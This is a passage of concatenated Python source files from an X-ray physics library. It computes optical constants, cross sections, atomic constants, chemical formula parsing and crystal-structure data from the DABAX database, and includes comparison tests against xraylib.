codata.c / codata.e * 1e10 re = codata.e ** 2 / codata.m_e / codata.c ** 2 / (4 * numpy.pi * codata.epsilon_0) * 1e2 # in cm molecules_per_cc = density * avogadro / atwt wavelength = toangstroms / energy * 1e-8 # in cm k = molecules_per_cc * re * wavelength * wavelength / 2.0 / numpy.pi delta = k * f1_interpolated betaf = k * f2_interpolated mu = 4.0 * numpy.pi * betaf / wavelength if F == 3: # F=3 returns delta [n = 1 -delta -i beta] return delta elif F == 4: # F=4 returns betaf [n = 1 -delta -i beta] return betaf elif F == 5: # F=5 returns Photoelectric linear absorption coefficient return mu elif F == 6: # F=6 returns Photoelectric mass absorption coefficient return mu / density elif F == 7: # F=7 returns Photoelectric Cross Section return mu / molecules_per_cc * 1e24 elif F == 11: # F=11 returns delta/betaf return delta / betaf # # mirror reflectivity # alpha = 2.0 * k * f1_interpolated gamma = 2.0 * k * f2_interpolated # rs,rp,runp = interface_reflectivity(alpha,gamma,theta) if rough != 0: rough *= 1e-8 # to cm debyewaller = numpy.exp( -( 4.0 * numpy.pi * numpy.sin(theta) * rough / wavelength)**2) else: debyewaller = 1.0 if F == 8: # returns s-polarized reflectivity return rs * debyewaller elif F == 9: # returns p-polarized reflectivity return rp * debyewaller elif F == 10: # returns unpolarized reflectivity return runp * debyewaller raise Exception("Invalid F=%g" % F) ######################### # cross section ######################### def cross_calc_dabax(descriptor, energy, col_titles=None, theta=3.0e-3, partial="TotalCrossSection", casematch=1, density=None, unit=0, verbose=True, filename="CrossSec_EPDL97.dat", dabax_repository=dabax_repository, interpolation_log=False): """ ; CROSS_CALC ; ; calculate the atomic cross sections and attenuation coefficients. ; It uses data from DABAX data-base. ; ; ; CALLING SEQUENCE: ; out = cross_calc(input,descriptor[,energy,col_titles]) ; INPUTS: ; input: a dabax input file as accepted by dabax_access(). ; The program also accepts the empty string '' and ; takes the first cross section file in the list. ; descriptor: a string with a description of the material. ; The string is searched in the scan titles #S in order ; to find the appropiated data. ; OPTIONAL INPUTS: ; energy: if undefined, it uses the standard energy grid, ; When energy is defined, this value is used as a grid ; for the results (it interpolates in the case of ; tabulated data). Always in eV. ; OPTIONAL OUTPUTS: ; col_titles: A array of strings with the labels of the data returned ; in "out" ; ; KEYWORDS: ; PARTIAL= Text string that has to be matched with the column titles ; in the DABAX data file. It is used to extract partial cross ; sections. For example PARTIAL='TotalCrossSection' (default value) will ; output the columns having this word in their labels, thus ; the total cross section. Use for example 'Compton', or ; 'Rayleigh' if you want to extract only one of the other partial ; cross sections or absorption coefficients. This keyword is ; case-insensitive unless you set the CASEMATCH keyword. ; CASEMATCH= to be used together with the PARTIAL keyword. ; When this keyword is set to 1, the matching for the text ; in PARTIAL is case sensitive. ; DENSITY= the density value to be used for the calculations. If ; not defined, take the value given by Atomic_Constants(). ; (used only if UNIT=3) ; UNIT= An integer indicating the unit of the output array ; 0 (default): barn/atom (Cross Section calculation) ; 1 : cm^2 (Cross Section calculation) ; 2 : cm^2/g (Mass Attenuation Coefficient) ; 3 : cm^-1 (Linear Attenuation Coefficient) ; VERBOSE= If set (default is verbose=1) prints some info. ; OUTPUT: ; out: an array with the values of the selected return parameter(s). ; ; PROCEDURE: ; Takes the CrossSection values from the DABAX files. It also takes the ; Atomic constants from DABAX, and performs the classical ; operations to calculate the other parameters. ; ; EXAMPLES: """ energy = numpy.array(energy,dtype=float).reshape(-1) if isinstance(descriptor,str): Z = atomic_number_dabax(descriptor) symbol = descriptor else: Z = descriptor symbol =atomic_symbols_dabax()[descriptor] if density is None: density = element_density_dabax(symbol, dabax_repository=dabax_repository, verbose=verbose) if verbose: print("cross_calc: using density: %f g/cm3" % density) # access spec file file1 = get_dabax_file(filename, dabax_repository=dabax_repository, verbose=verbose) sf = SpecFile(file1) flag_found = False for index in range(len(sf)): s1 = sf[index] name = s1.scan_header_dict["S"] line = " ".join(name.split()) if (line.split(' ')[1]) == descriptor: flag_found = True index_found = index break if not flag_found: raise (Exception("Entry name not found: %s" % descriptor)) if partial is None: F = 'TotalCrossSection' else: F = partial data = sf[index_found].data L = sf.labels(index_found) for i,iL in enumerate(L): if "PhotonEnergy" in iL: index_energy = i break fconv = 1.0 if "KEV" in L[index_energy].upper(): fconv = 1e3 elif "MEV" in L[index_energy].upper(): fconv = 1e6 for i, iL in enumerate(L): if F in iL: index_column = i break if verbose: print(">>>>>>>>>>>>>>>>>>> extracting: ", index_energy, index_column, L[index_energy].capitalize(), L[index_column], "fconv: ",fconv) photon_energy = data[index_energy, :].copy() * fconv cross_section = data[index_column, :].copy() if interpolation_log: cross_section_interpolated = 10 ** numpy.interp(numpy.log10(energy), numpy.log10(photon_energy), numpy.log10(numpy.abs(cross_section))) else: cross_section_interpolated = numpy.interp(energy, photon_energy, cross_section) if unit == 0: str_unit = 'barn/atom' elif unit == 1: # cm^2 cross_section_interpolated *= 1e-24 str_unit = 'cm^2' elif unit == 2: # cm^2/g cf = 1e-24 * codata.Avogadro / \ atomic_constants_dabax(descriptor,return_label='AtomicMass',dabax_repository=dabax_repository,verbose=verbose) cross_section_interpolated *= cf str_unit = 'cm^2/g' elif unit == 3: # cm^-1 cf = 1e-24 * codata.Avogadro / \ atomic_constants_dabax(descriptor,return_label='AtomicMass',dabax_repository=dabax_repository,verbose=verbose) * density cross_section_interpolated *= cf str_unit = 'cm^-1' return cross_section_interpolated ###################### # miscellaneous ###################### def atomic_weights_dabax(descriptor, filename="AtomicWeights.dat", dabax_repository=dabax_repository, verbose=True, ): """ ; Returns atomic weights from DABAX. ; ; INPUTS: ; id: an identifier string (i.e. 'Si', '70Ge) ; ; If descriptor is the symbol (e.g., Ge), ; the averaged atomic mass is returned. ; If descriptor contains the isotope (number of nucleons) (e.g., 70Ge), ; the atomic mass for the isotope is returned. ; ; filename = the DABAX inout file (default AtomicWeights.dat) """ if isinstance(descriptor,str): descriptor = [descriptor] descriptor_is_string = 1 else: # is list descriptor_is_string = 0 # access spec file file1 = get_dabax_file(filename, dabax_repository=dabax_repository, verbose=verbose) sf = SpecFile(file1) out = [] for idescriptor in descriptor: flag_found = False index_found = [] for index in range(len(sf)): s1 = sf[index] name = s1.scan_header_dict["S"] line = " ".join(name.split()) scan_name = line.split(' ')[1] if scan_name[-len(idescriptor):] == idescriptor: flag_found = True index_found.append(index) if not flag_found: raise (Exception("Entry name not found: %s" % idescriptor)) data = sf[index_found[0]].data if idescriptor[0].isdigit(): out.append(data[0,0]) else: out.append(data[2,0]) if descriptor_is_string: return out[0] else: return out def atomic_symbols_dabax(): return [ 'Vacuum','H','He','Li','Be','B','C','N','O','F','Ne', 'Na','Mg','Al','Si','P','S','Cl','Ar','K','Ca', 'Sc','Ti','V','Cr','Mn','Fe','Co','Ni','Cu','Zn', 'Ga','Ge','As','Se','Br','Kr','Rb','Sr','Y','Zr', 'Nb','Mo','Tc','Ru','Rh','Pd','Ag','Cd','In','Sn', 'Sb','Te','I','Xe','Cs','Ba','La','Ce','Pr','Nd', 'Pm','Sm','Eu','Gd','Tb','Dy','Ho','Er','Tm','Yb', 'Lu','Hf','Ta','W','Re','Os','Ir','Pt','Au','Hg', 'Tl','Pb','Bi','Po','At','Rn','Fr','Ra','Ac','Th', 'Pa','U','Np','Pu','Am','Cm','Bk','Cf','Es','Fm', 'Md','No','Lr','Rf','Db','Sg','Bh','Hs','Mt','Ds', 'Rg','Uub','Uut','Uuq','Uup','Uuh','Uus','Uuo'] def atomic_names_dabax(): return [ 'Vacuum', 'Hydrogen', 'Helium', 'Lithium', 'Beryllium', 'Boron', 'Carbon', 'Nitrogen', 'Oxygen', 'Fluorine', 'Neon', 'Sodium', 'Magnesium', 'Aluminum', 'Silicon', 'Phosphorus', 'Sulfur', 'Chlorine', 'Argon', 'Potassium', 'Calcium', 'Scandium', 'Titanium', 'Vanadium', 'Chromium', 'Manganese', 'Iron', 'Cobalt', 'Nickel', 'Copper', 'Zinc', 'Gallium', 'Germanium', 'Arsenic', 'Selenium', 'Bromine', 'Krypton', 'Rubidium', 'Strontium', 'Yttrium', 'Zirconium', 'Niobium', 'Molybdenum', 'Technetium', 'Ruthenium', 'Rhodium', 'Palladium', 'Silver', 'Cadmium', 'Indium', 'Tin', 'Antimony', 'Tellurium', 'Iodine', 'Xenon', 'Cesium', 'Barium', 'Lanthanum', 'Cerium', 'Praseodymium', 'Neodymium', 'Promethium', 'Samarium', 'Europium', 'Gadolinium', 'Terbium', 'Dysprosium', 'Holmium', 'Erbium', 'Thulium', 'Ytterbium', 'Lutetium', 'Hafnium', 'Tantalum', 'Tungsten', 'Rhenium', 'Osmium', 'Iridium', 'Platinum', 'Gold', 'Mercury', 'Thallium', 'Lead', 'Bismuth', 'Polonium', 'Astatine', 'Radon', 'Francium', 'Radium', 'Actinium', 'Thorium', 'Protactinium', 'Uranium', 'Neptunium', 'Plutonium', 'Americium', 'Curium', 'Berkelium', 'Californium', 'Einsteinium', 'Fermium', 'Mendelevium', 'Nobelium', 'Lawrencium', 'Rutherfordium', 'Dubnium', 'Seaborgium', 'Bohrium', 'Hassium', 'Meitnerium', 'Darmstadtium', 'Roentgenium', 'Ununbium', 'Ununtrium', 'Ununquadium', 'Ununpentium', 'Ununhexium', 'Ununseptium', 'Ununoctium'] def atomic_number_dabax(symbol): return atomic_symbols_dabax().index(symbol) def atomic_constants_dabax(descriptor, filename="AtomicConstants.dat", dabax_repository=dabax_repository, verbose=True, return_item=0, return_label=None, ): """ ; Returns atomic constants from DABAX. ; ; CALLING SEQUENCE: ; out = atomic_constants(id,file,return=return) ; INPUTS: ; id: an identifier (or an array of identifiers) to be found in the ; scan title (i.e. 'Si') ; ; KEYWORDS: ; File = the DABAX inout file (default: AtomicConstants.dat) ; return_label and return_item define the variable to be returned. ; If return_name is not None, it has priority over retirn_index ; number of the column in the DABAX file, or a text ; identifier (case insensitive) listed below: ; return_label='AtomicRadius' or return_item=0 ; return_label='CovalentRadius' or return_item=1 ; return_label='AtomicMass' or return_item=2 ; return_label='BoilingPoint' or return_item=3 ; return_label='MeltingPoint' or return_item=4 ; return_label='Density' or return_item=5 ; return_label='AtomicVolume' or return_item=6 ; return_label='CoherentScatteringLength' or return_item=7 ; return_label='IncoherentX-section' or return_item=8 ; return_label='[email protected]' or return_item=9 ; return_label='DebyeTemperature' or return_item=10 ; return_label='ThermalConductivity' or return_item=11 ; ; OUTPUT: ; out: the value of the selected parameter ; ; EXAMPLES: ; print(atomic_constants('Si',return='AtomicMass')) ; 28.085500 ; print(atomic_constants(14,return='AtomicMass')) ; 28.085500 ; print(atomic_constants([14,27],return='AtomicMass')) ; 28.085500 58.933200 ; ;- """ if isinstance(descriptor,str): descriptor = [descriptor] descriptor_is_string = 1 else: # is list descriptor_is_string = 0 return_index = -1 if return_label is None: return_index = return_item else: if return_label == 'AtomicRadius' : return_index = 0 if return_label == 'CovalentRadius' : return_index = 1 if return_label == 'AtomicMass' : return_index = 2 if return_label == 'BoilingPoint' : return_index = 3 if return_label == 'MeltingPoint' : return_index = 4 if return_label == 'Density' : return_index = 5 if return_label == 'AtomicVolume' : return_index = 6 if return_label == 'CoherentScatteringLength' : return_index = 7 if return_label == 'IncoherentX-section' : return_index = 8 if return_label == '[email protected]' : return_index = 9 if return_label == 'DebyeTemperature' : return_index = 10 if return_label == 'ThermalConductivity' : return_index = 11 if return_index == -1: raise Exception("Bad item index") # access spec file file1 = get_dabax_file(filename, dabax_repository=dabax_repository, verbose=verbose) sf = SpecFile(file1) out = [] for idescriptor in descriptor: for index in range(len(sf)): flag_found = False s1 = sf[index] name = s1.scan_header_dict["S"] scan_name = name.split(' ')[1] if scan_name == idescriptor: flag_found = True index_found = index break if flag_found: out.append((sf[index_found].data)[return_index, 0]) else: raise Exception("Data not found for %s " % idescriptor) if descriptor_is_string: return out[0] else: return out def element_density_dabax(descriptor, filename="AtomicConstants.dat", dabax_repository=dabax_repository, verbose=True,): return atomic_constants_dabax(descriptor, filename=filename, return_label="Density",dabax_repository=dabax_repository, verbose=verbose) def CompoundParser(descriptor, dabax_repository=dabax_repository, verbose=True): zetas, fatomic = parse_formula(formula=descriptor, verbose=verbose) elements = [] atomic_weight = [] massFractions = [] for i,z in enumerate(zetas): symbol = atomic_symbols_dabax()[z] atw = atomic_weights_dabax(symbol, dabax_repository=dabax_repository, verbose=verbose) elements.append(z) atomic_weight.append(atw) massFractions.append(fatomic[i]*atw) mweight = 0.0 for i in range(len(fatomic)): mweight += atomic_weight[i] * fatomic[i] for i in range(len(massFractions)): massFractions[i] /= mweight new_dict = { "nElements": len(elements), "nAtomsAll": float(numpy.array(fatomic).sum()), "Elements":zetas, "massFractions": massFractions, "nAtoms":fatomic, "molarMass": mweight, } return new_dict def parse_formula(formula, verbose=True): import re if formula.count('(') == 0: pass elif formula.count('(') == 1: if verbose: print("Found parentheses") match = re.search(r'\([\x00-\xFF]*\)(\d\.?\d?)', formula) subformula = match.group(0) if verbose: print(" >>>>>>> subformula", subformula) match = re.search(r'\(([^\)]*)\)', subformula) subformula_inside_parentheses = match.group(0)[1:-1] if verbose: print(" >>>>>>> subformula inside parentheses", subformula_inside_parentheses) match = re.search(r'\)\d\.?\d?', subformula) times = float(match.group(0)[1:]) if verbose: print(" >>>>>>> times", times) zetas, fatomic = parse_formula(subformula_inside_parentheses, verbose=verbose) if verbose: print(" >>>> zetas, fatomic:",zetas, fatomic) string = '' for i,element in enumerate(zetas): string += atomic_symbols_dabax()[element] + "%g" % (fatomic[i] * times) if verbose: print(" expanded: ", string, "replaced", formula.replace(subformula, string)) return parse_formula(formula.replace(subformula, string), verbose=verbose) else: raise NotImplementedError("wrong formula %s: multiple parentheses not implemented" % formula ) tmp = re.findall(r'([A-Z][a-z]*)(\d*\.?\d?)', formula) fatomic = [] zetas = [] for element,str_number in tmp: if str_number == '': number = 1 else: number = float(str_number) fatomic.append(float(number)) zetas.append(atomic_number_dabax(element)) return zetas, fatomic if __name__ == "__main__": import xraylib # for comparisons from srxraylib.plot.gol import plot # redefine the default server at ESRF because default server name is different outside and inside ESRF import socket if socket.getfqdn().find("esrf") >= 0: # dabax_repository = "http://ftp.esrf.fr/pub/scisoft/DabaxFiles/" dabax_repository = "/scisoft/DABAX/data" else: dabax_repository = "http://ftp.esrf.eu/pub/scisoft/DabaxFiles/" # # crystal tests # if True: print(get_dabax_file("Crystals.dat", dabax_repository=dabax_repository, verbose=0)) print(get_f0_coeffs_from_dabax_file("Y3+", filename="f0_InterTables.dat", dabax_repository=dabax_repository)) print(Crystal_GetCrystalsList(dabax_repository=dabax_repository)) yb = Crystal_GetCrystal('YB66', filename='Crystals.dat', dabax_repository=dabax_repository) si = Crystal_GetCrystal("Si", dabax_repository=dabax_repository) print("Si 111 d-spacing: ", Crystal_dSpacing(si,1,1,1)) print("Si 111 bragg angle at 10 keV [deg]: ", 180 / numpy.pi * Bragg_angle(si,10, 1,1,1)) # # crystal vs xraylib tests # if True: print(Crystal_GetCrystal(entry_name='YB66', filename='Crystals.dat', dabax_repository=dabax_repository)) # compare with xraylib xdabax = Crystal_GetCrystal(entry_name='Si', filename='Crystals.dat', dabax_repository=dabax_repository) xxraylib = xraylib.Crystal_GetCrystal('Si') for key in xxraylib.keys(): tmp = xxraylib[key] if isinstance(tmp, list): for i, element in enumerate(tmp): print(key, i, xdabax[key][i], xxraylib[key][i]) else: print(key, xdabax[key], xxraylib[key]) # # f0 # if True: # # test f0 data for B3+ # q = numpy.array([0,0.05,0.1,0.15,0.2,0.25,0.3,0.35,0.4,0.5,0.6,0.7,0.8,0.9,1,1.1,1.2,1.3,1.4,1.5,1.6,1.7,1.8,1.9]) f0_B3plus = numpy.array([2,1.995,1.979,1.954,1.919,1.875,1.824,1.766,1.703,1.566,1.42,1.274,1.132,0.999,0.877,0.767,0.669,0.582,0.507,0.441,0.384,0.335,0.293,0.256]) # # plot # from srxraylib.plot.gol import plot coeff_Bdot = numpy.array([]) plot(q, f0_B3plus, q, calculate_f0_from_f0coeff(f0_with_fractional_charge(5, 3.0, dabax_repository=dabax_repository), q), q, calculate_f0_from_f0coeff(f0_with_fractional_charge(5, 2.8, dabax_repository=dabax_repository), q), xtitle=r"q (sin $\theta$ / $\lambda$)", ytitle="f0 [electron units]", legend=["B3plus original", "B3plus from f0_with_fractional_charge(5,+3)", "B3plus from f0_with_fractional_charge(5,+2.8)"], title="") # # f0 another test # if True: # # test f0 data for B3+ # q = numpy.array( [0, 0.05, 0.1, 0.15, 0.2, 0.25, 0.3, 0.35, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1, 1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8, 1.9]) f0_B3plus = numpy.array( [2, 1.995, 1.979, 1.954, 1.919, 1.875, 1.824, 1.766, 1.703, 1.566, 1.42, 1.274, 1.132, 0.999, 0.877, 0.767, 0.669, 0.582, 0.507, 0.441, 0.384, 0.335, 0.293, 0.256]) # # plot # from srxraylib.plot.gol import plot coeff_Bdot = numpy.array([]) plot(q, f0_B3plus, q, calculate_f0_from_f0coeff(f0_with_fractional_charge(5, 3.0, dabax_repository=dabax_repository), q), q, calculate_f0_from_f0coeff(f0_with_fractional_charge(5, 2.8, dabax_repository=dabax_repository), q), xtitle=r"q (sin $\theta$ / $\lambda$)", ytitle="f0 [electron units]", legend=["B3plus original", "B3plus from f0_with_fractional_charge(5,+3)", "B3plus from f0_with_fractional_charge(5,+2.8)"], title="", show=1) # # f1f2 tests # if True: from orangecontrib.xoppy.util.xoppy_xraylib_util import f1f2_calc files_f1f2 = [ "f1f2_asf_Kissel.dat", "f1f2_BrennanCowan.dat", "f1f2_Chantler.dat", "f1f2_CromerLiberman.dat", "f1f2_EPDL97.dat", "f1f2_Henke.dat", "f1f2_Sasaki.dat", "f1f2_Windt.dat", ] out = [] energy = numpy.linspace(1000,28000,500) F=1 # for F in [1]: # range(12) tmpX = f1f2_calc("Si", energy, F=F, theta=2e-3, verbose=0) out.append(tmpX) for file_f1f2 in files_f1f2: tmp = f1f2_calc_dabax("Si", energy, F=F, theta=2e-3, verbose=0, filename=file_f1f2, dabax_repository=dabax_repository ) out.append(tmp) legend = ['xraylib'] for file_f1f2 in files_f1f2: legend.append(file_f1f2) plot(energy, out[0], energy, out[1], energy, out[2], energy, out[3], energy, out[4], energy, out[5], energy, out[6], energy, out[7], energy, out[8], legend=legend, xlog=1,ylog=1) for F in range(12): a_xraylib = f1f2_calc("Si", 10000, F=F, theta=2e-3, verbose=0) a_dabax = f1f2_calc_dabax("Si", 10000, F=F, theta=2e-3, verbose=0, filename=file_f1f2, dabax_repository=dabax_repository) diff = (numpy.array(a_dabax) - numpy.array(a_xraylib)) / numpy.array(a_xraylib) print("dabax: ", file_f1f2, a_dabax) print("xraylib: ", a_xraylib) print("diff: ", numpy.abs( diff.sum())) assert (numpy.abs( diff.sum()) < 0.11 ) if True: # # misc # print("Ge, Si: ", atomic_weights_dabax(["Ge","Si"],dabax_repository=dabax_repository)) print("70Ge: ", atomic_weights_dabax("70Ge",dabax_repository=dabax_repository)) print(atomic_symbols_dabax()[14], atomic_names_dabax()[14]) print("Si atomic mass", atomic_constants_dabax("Si", return_item=2, dabax_repository=dabax_repository, verbose=0)) print("Si,Ge atomic mass", atomic_constants_dabax(["Si","Ge"], return_item=2, dabax_repository=dabax_repository, verbose=0)) print("Si,Co atomic mass", atomic_constants_dabax(["Si", "Co"], return_label='AtomicMass', dabax_repository=dabax_repository, verbose=0)) print("Z=27", atomic_symbols_dabax()[27]) print("Ge Z=%d" % atomic_number_dabax("Ge")) print("Density Si: ", xraylib.ElementDensity(14), element_density_dabax("Si", dabax_repository=dabax_repository,verbose=0)) # TODO: does not work for double parenthesis "Ga2(F(KI))3" for descriptor in ["H2O","Eu2H2.1O1.3","PO4", "Ca5(PO4)3.1F"]: print("\n",descriptor, dabax_repository) print("DABAX: ", CompoundParser(descriptor, dabax_repository=dabax_repository, verbose=0)) print("XRAYLIB: ", xraylib.CompoundParser(descriptor)) if True: # # cross sections # from orangecontrib.xoppy.util.xoppy_xraylib_util import cross_calc unit = 1 filenames = ["CrossSec_EPDL97.dat", "CrossSec_BrennanCowan.dat", "CrossSec_McMaster.dat", "CrossSec_NISTxaamdi.dat", "CrossSec_PE_Scofield.dat", "CrossSec_StormIsrael.dat", "CrossSec_XCOM.dat", ] energy = numpy.linspace(10000, 20000, 200) out = [] tmpX = cross_calc("Si", energy, calculate=0, unit=unit) out.append(tmpX) for filename in filenames: tmp = cross_calc_dabax("Si", energy, partial='TotalCrossSection', unit=unit, filename=filename, dabax_repository=dabax_repository, verbose=0) out.append(tmp) legend = ['xraylib'] for file in filenames: legend.append(file) plot(energy, out[0], energy, out[1], energy, out[2], energy, out[3], energy, out[4], energy, out[5], energy, out[6], energy, out[7], legend=legend, xlog=1,ylog=1) ``` #### File: yb66/discussion/dabax_util.py ```python import os import numpy from urllib.request import urlretrieve from silx.io.specfile import SpecFile from orangecontrib.xoppy.util.xoppy_xraylib_util import bragg_metrictensor from f0coeffs_fit import crystal_get_f0_coeffs from symbol_to_from_atomic_number import symbol_to_from_atomic_number """ <NAME>, <EMAIL>, <NAME> <EMAIL> """ def get_dabax_file(filename, url="http://ftp.esrf.eu/pub/scisoft/DabaxFiles/"): try: if os.path.exists(filename): print("File exists: %s " % filename) else: filepath, http_msg = urlretrieve(url + filename, filename=filename, reporthook=None, data=None) print("File %s downloaded from %s" % (filepath, url + filename)) return True except: return False def get_f0_coeffs_from_dabax_file(entry_name="Y3+", filename="f0_InterTables.dat"): error_flag = get_dabax_file(filename) if error_flag == False: raise(FileNotFoundError) sf = SpecFile(filename) flag_found = False for index in range(len(sf)): s1 = sf[index] name = s1.scan_header_dict["S"] if name.split(' ')[1] == entry_name: flag_found = True index_found = index if flag_found: return numpy.array(sf[index_found].data)[:,0] else: raise(Exception("Entry name not found: %s" % entry_name)) def get_f0_from_f0coeff(f0coeff, ratio): icentral = len(f0coeff) // 2 F0 = f0coeff[icentral] for i in range(icentral): F0 += f0coeff[i] * numpy.exp(-1.0 * f0coeff[i + icentral + 1] * ratio ** 2) return F0 def crystal_parser(filename='Crystals.dat', entry_name='YB66'): """ parse a complex crystal structure file into a dictionary (like xraylib) return a dictionary containing crystal infomation """ error_flag = get_dabax_file(filename) sf = SpecFile(filename) flag_found = False for index in range(len(sf)): s1 = sf[index] name = s1.scan_header_dict["S"] if name.split(' ')[1] == entry_name: flag_found = True index_found = index if not flag_found: raise (Exception("Entry name not found: %s" % entry_name)) cryst = {'name':entry_name} #returned dictionary like that one created by xraylib.Crystal_GetCrystal(descriptor) cell_parameters = sf[index_found].scan_header_dict["UCELL"] cell_parameters = ' '.join(cell_parameters.split()) # remove multiple blanks a = cell_parameters.split(' ') cryst['a'] = float(a[0]) cryst['b'] = float(a[1]) cryst['c'] = float(a[2]) cryst['alpha'] = float(a[3]) cryst['beta'] = float(a[4]) cryst['gamma'] = float(a[5]) alpha = float(a[3]) * numpy.pi / 180 beta = float(a[4]) * numpy.pi / 180 gamma = float(a[5]) * numpy.pi / 180 # I do not know is this is valid for all crystal systems... # volume = float(a[1]) * float(a[2]) * float(a[3]) * \ # numpy.sqrt((1 - numpy.cos(alpha) ** 2 - numpy.cos(beta) ** 2 - numpy.cos(gamma) ** 2) + \ # 2 * numpy.cos(alpha) * numpy.cos(beta) * numpy.cos(gamma)) # for cubic=a*b*c volume = bragg_metrictensor(float(a[0]), float(a[1]), float(a[2]), float(a[3]), float(a[4]), float(a[5]), RETURN_VOLUME=1) cryst['volume'] = volume cell_data = numpy.array(sf[index_found].data) cryst['n_atom'] = cell_data.shape[1] atom = [] for i in range(cell_data.shape[1]): if cell_data.shape[0] == 5: # standard 5 columns atom.append({'Zatom':int(cell_data[0,i]), 'fraction':cell_data[1,i], 'x': cell_data[2,i], 'y': cell_data[3, i], 'z': cell_data[4, i],}) else: # 6 columns (charge) #'AtomicName' required to compatible my current code s = symbol_to_from_atomic_number(int(cell_data[0,i])) if cell_data[5, i] != 0: #charged s = s + f'%+g'%cell_data[5, i] atom.append({'AtomicName': s, 'Zatom':int(cell_data[0,i]), 'fraction':cell_data[1,i], 'x': cell_data[2,i], 'y': cell_data[3, i], 'z': cell_data[4, i], 'charge': cell_data[5, i],}) cryst['atom'] = atom cryst['cpointer'] = None # TODO: Get and store anisotropic coeffs ANISO_KEY = "UANISO_COFF" #prefix for a line with anisotropic coefficients #tmp = sf[index_found].scan_header_dict["UANISO_COFF_B1"] d = sf[index_found].scan_header_dict AnisoItem = {'Name': ' ', 'start': 0, 'end': 0, 'beta11': 0.0, 'beta22': 0.0, 'beta33': 0.0, 'beta12': 0.0, 'beta13': 0.0, 'beta23': 0.0} a=[ (x, d[x].split()) for x in d if x[:len(ANISO_KEY)] == ANISO_KEY] if len(a) >0: #found Anisotropic coefficients in the header, process it a=sorted(a,key=lambda x:int(x[1][0]),reverse=False) #sort 'Start' ascendant, avoid order changed by the SpecFile n = 0 for x in a: #tuple('UANISO_COFF_B1',[1 96 0.00038 0.00044 0.00039 0 0 0]) AnisoItem['Name']= x[0][len(ANISO_KEY)+1:] #get site atom name starting from 13th character 'B1', etc AnisoItem['start']= int(x[1][0]) AnisoItem['end']= int(x[1][1]) AnisoItem['beta11']= float(x[1][2]) AnisoItem['beta22']= float(x[1][3]) AnisoItem['beta33']= float(x[1][4]) AnisoItem['beta12']= float(x[1][5]) AnisoItem['beta13']= float(x[1][6]) AnisoItem['beta23']= float(x[1][7]) if n ==0: Aniso = numpy.array([AnisoItem.copy()]) else: Aniso = numpy.append(Aniso,[AnisoItem.copy()]) n = n + 1 cryst['Aniso'] = Aniso #if having key 'Ansio' when there is anisotropic data,otherwise no cryst['n_aniso']= n return cryst def crystal_atnum(list_AtomicName, unique_AtomicName, unique_Zatom,list_fraction, f0coeffs): """ To get the atom and fractional factor in diffierent sites list_AtomicName: list of all atoms in the crystal unique_AtomicName: list of unique atomicname in the list unique_Zatom: list of unique atomic number list_fraction: list of unique fractial factor return: num_e, fract, n_atom, list of number of electrons for atom with same fractional factor, and corresponding fractional factor, atomic number """ import re from orangecontrib.xoppy.util.xoppy_xraylib_util import f0_xop num_e = [] fract = [] n_atom = [] n_ATUM = [] for k,x in enumerate(unique_AtomicName): tmp1 = re.search('(^[a-zA-Z]*)',x) if tmp1.group(0) == x: #AtomicName only, without valence info (i.e., B, Y, O) f0 = f0_xop(unique_Zatom[k]) else: #f0 = f0_xop(0,AtomicName=x) f0 = f0coeffs[x] icentral = int(len(f0)/2) F000 = f0[icentral] for i in range(icentral): F000 += f0[i] a=[list_fraction[i] for i,v in enumerate(list_AtomicName) if v==x] fac = list(set(a)) for y in fac: n = a.count(y) num_e.append(F000) fract.append(y) n_atom.append(n) n_ATUM.append(unique_Zatom[k]) return num_e.copy(), fract.copy(), n_atom.copy(),n_ATUM.copy() def Crystal_GetCrystalsList(): """ get crystal names from crystals.dat """ sf = SpecFile('Crystals.dat') crystals = [] for index in range(len(sf)): s1 = sf[index] name = s1.scan_header_dict["S"] crystals.append(name.split(' ')[1]) return crystals ``` #### File: yb66/discussion/f0coeffs_fit.py ```python import numpy from dabax_access_f0 import get_f0_coeffs_from_dabax_file, get_f0_from_f0coeff from symbol_to_from_atomic_number import symbol_to_from_atomic_number from scipy.optimize import curve_fit """ <NAME> <EMAIL>, <NAME>, <EMAIL> Interpolation of f0 coefficients for a fractional charged atom """ def func(q, a1, a2, a3, a4, a5, a6, a7, a8, a9): return get_f0_from_f0coeff([a1, a2, a3, a4, a5, a6, a7, a8, a9], q) def get_f0_coeffs(atoms, list_Zatom): """ Return a Dict {"B-0.0455": [f0 coefficients], ..., "Y+3":[f0 coefficients],...} """ AtomicChargeList = {} #first row is atomic number, it is integer UniqueAtomicNumber = list(sorted(set(list_Zatom))) charge = [ atoms[i]['charge'] for i in range(len(atoms))] for x in UniqueAtomicNumber: AtomicChargeList[str(x)]= [] for i,x in enumerate(list_Zatom): if charge[i] not in AtomicChargeList[str(int(x))]: AtomicChargeList[str(int(x))].append(charge[i]) #Charge value return crystal_get_f0_coeffs(AtomicChargeList.items()) def crystal_get_f0_coeffs(AtomicList): """ Input: AtomicList, a list of tuple {(5,[-0.0455,]), (39,[3,])}, same atom allows with different charge Out: A Dict {"B-0.0455": [f0 coefficients], ..., "Y+3":[f0 coefficients],...} """ f0coeffs = {} searchChargeNameNeg = ['1-','2-','3-','4-','5-','6-','7-'] searchChargeNamePos = ['1+','2+','3+','4+','5+','6+','7+'] qq = numpy.linspace(0,2,1000) #q = 0 to 2 for x in AtomicList: n = int(x[0]) #atomic number sym = symbol_to_from_atomic_number(n) f0 = get_f0_coeffs_from_dabax_file(entry_name=sym) if len(f0) == 0: raise("cannot find f0 coefficients for '" + sym + "'") for charge in x[1]: #may have multiple valences for same atom, B1+, B2+, etc k = int(charge) f01 = [] if charge < 0: if k == charge: #integer charge f01 = get_f0_coeffs_from_dabax_file(entry_name=sym + searchChargeNameNeg[abs(k)-1]) if len(f01) == 0: ff = [] for i,s in enumerate(searchChargeNameNeg): f01 = get_f0_coeffs_from_dabax_file(entry_name=sym + s) if len(f01) > 0: ff.append((-i-1,f01)) if (i+1) > abs(k): #already find one with valence higher than atom carried charge break if len(ff) > 0: f01 = ff[-1] if len(f01) == 0 and 0 != charge: #not get a f0 in negative charge direction ff = [] for i,s in enumerate(searchChargeNamePos): #try to find one with positive charge f01 = get_f0_coeffs_from_dabax_file(entry_name=sym + s) if len(f01) > 0: ff.append((i+1,f01)) if (i+1) > abs(k) or charge < 0: break if len(ff) > 0: f01 = ff[-1] if charge == 0: #always no fit for neutral atom f0coeffs[sym] = f0 continue #following for charged atom if len(f01) == 0: raise("No 2nd atom found for linear fit f0 coefficients") if charge == f01[0]: #if charged atom already 